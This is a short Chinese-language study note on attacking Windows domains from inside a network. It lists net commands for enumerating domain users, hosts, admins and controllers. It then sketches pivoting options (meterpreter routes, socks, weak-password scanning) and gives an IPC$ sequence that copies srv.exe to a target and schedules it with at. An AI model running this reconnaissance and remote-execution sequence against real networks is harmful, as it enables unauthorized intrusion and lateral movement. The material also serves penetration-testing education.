内网攻击域渗透学习(笔记)

信息收集

有了内网的第一台机器的权限后,就到了很关键的一步信息收集,它也是内网渗透中不可或缺的一部分。
查看当前机器的网络环境,收集域里的相关信息,包括所有的用户、所有的计算机,以及相关关键组的信息。

net user/domain:查看域用户
net view/domain:查看有几个域
net view/domain:xxx:查看域内的主机
net group/domain:查看域里面的组
net group "domain computers" /domain:查看域内所有的主机名
net group "domain admins" /domain:查看域管理员
net group "domain controllers" /domain:查看域控制器
net group "enterprise admins" /domain:查看企业管理组
nettime/domain:查看时间服务器

通过以上可以获得很多信息,此时有两种情况:

当前服务器可以直接攻击域服务器和不可以直接攻击域服务器

不可以直接攻击又分为两种情况:

如果是权限不够就需要提升权限,如果是不能连接到域服务器,则需要攻击内网中某个可以连接到域服务器的服务器,然后以此做为跳板

现在权限问题不可以直接攻击域服务器,可以采取以下方法继续渗透:

  • 使用meterpreter目前拥有的权限添加内网路由,进行弱口令扫描
  • 使用powershell对内网进行扫描(要求目标机是windows7以上的服务器)
  • 架设socks4a然后socks会自动进行内网扫描
  • 利用当前权限进行内网IPC$渗透
  • 其他方法

ICP$入侵

即通过使用windows系统中默认启动的IPC$共享获得计算机控制权的入侵,在内网中极其常见。

 D:>net use\127.0.0.1\IPC$	连接127.0.0.1的IPC$共享
 D:>copy srv.exe\127.0.0.1\IPC$	复制srv.exe到目标机
 D:>net time\127.0.0.1	查时间
 D:>at \127.0.0.1 10:50 srv.exe	用at命令在10点50分启动srv.exe
上一篇:linux操作总结汇总:进程内存通信 C语言


下一篇:进程间通信IPC